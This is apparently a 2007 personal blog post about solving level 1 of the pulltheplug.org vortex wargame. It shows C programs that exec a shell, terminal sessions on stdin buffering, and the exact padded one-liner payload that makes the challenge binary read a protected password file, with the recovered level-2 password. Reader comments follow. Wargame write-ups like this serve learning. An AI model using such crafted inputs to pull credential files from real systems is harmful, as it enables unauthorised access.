in the name of zero

March 13, 2007

ok this is whacked!

the concepts involved are, i guess, common knowledge… but the answers elude me somehow. (and listening to Metallica doesn’t help for some reason.)

f*ck!

consider the following:

/* shitprog.c */

#include <stdio.h>
#include <unistd.h>

int main(void)
{
	/* replace this process with an interactive shell; it inherits our stdin and stdout */
	execlp("/bin/sh", "sh", "-i", NULL);
	return 0;
}

fairly easy to figure out, don’t you agree?

now for some output:

misha@heaven ~ $ ./shitprog
sh-3.00$ 

as expected. we have a shell! next, let’s try passing commands to the shell via stdin.

misha@heaven ~ $ echo "whoami" | ./shitprog
sh-3.00$ misha
sh-3.00$ exit

still working as expected so far…

to further build my case, let’s mess with stdin before calling execlp(), shall we? (i used getchar())

/* anothershitprog.c */

#include <stdio.h>
#include <unistd.h>

int main(void)
{
	getchar();	/* read a single character from stdin, through stdio, before the exec */

	execlp("/bin/sh", "sh", "-i", NULL);
	return 0;
}

again, let’s try running it.

misha@heaven ~ $ ./anothershitprog
f
sh-3.00$

this time the program waits for me to type a character and hit enter, and only then does the execlp() happen…

so how about a command via stdin like what we did before?

misha@heaven ~ $ echo "whoami" | ./anothershitprog
sh-3.00$ exit

what the fuck!? it just exits! the shell comes up, never sees “whoami”, and quits as if it had hit EOF on stdin right away.

i finally solved the problem by writing 4096 bytes of garbage immediately preceding my “command”, like so:

misha@heaven ~ $ echo $(perl -e 'print "a"x4096, "whoami"') | ./anothershitprog
sh-3.00$ misha
sh-3.00$ exit

i tried the same method on pulltheplug.org’s vortex challenge (level 1, whose goal is the level 2 password), but wasn’t as successful: the “pad to 4096” trick doesn’t work there.

luckily… the number of “/” in front of a command doesn’t make any difference: /bin/ls is the same as ///////////bin/ls. so if the padding is made of slashes it doesn’t matter exactly how much of it gets eaten, whatever survives just becomes the front of the path.

so this is how my session went:

level1@vortex ~ $ echo $(perl -e 'print "\\"x257,"\xca","/"x3838, "bin/cat /etc/pass/level2"') | /levels/level1
sh-3.1$ 23anbT\rE
sh-3.1$ exit

that’s how i got the pass for level 2.

anyone care to fill me in on the gray areas? it’s 12:38 am and i’m totally wasted.

5 Comments »


  1. Hi.
    How did you discover that: “i finally solved the problem by writing a 4096 byte garbage immediately preceeding my “command”,” ? I’m really curious why it is working…

    Comment by cyfran — July 30, 2007 @ 10:57 pm

  2. Hi there cyfran… sadly, i can’t really remember how i got that value… =( for now, i can only say that i started out with just trial and error…

    it didn’t work when i tried that value on the vortex challenge though…

    Comment by sleepy jenkins — July 31, 2007 @ 7:38 am

  3. Thanks for the response! Maybe someday I’ll figure that out (if somebody does before me, please leave a message here).

    Comment by cyfran — July 31, 2007 @ 4:55 pm

  4. i’ll try doing this exercise again when i find time. real life has been too much of an attention hog these days …

    Comment by sleepy jenkins — August 2, 2007 @ 8:52 am

